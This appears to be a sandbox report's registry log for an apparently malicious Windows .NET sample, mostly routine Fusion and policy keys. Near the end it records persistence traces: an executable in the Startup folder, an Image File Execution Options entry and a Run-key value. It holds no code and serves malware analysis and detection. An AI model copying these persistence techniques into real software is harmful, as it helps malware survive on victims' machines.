HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|chds.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1008786c\7da7a542 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1008786c\7ea37736 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chdsks.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|chdsks.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\chdskskas
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies 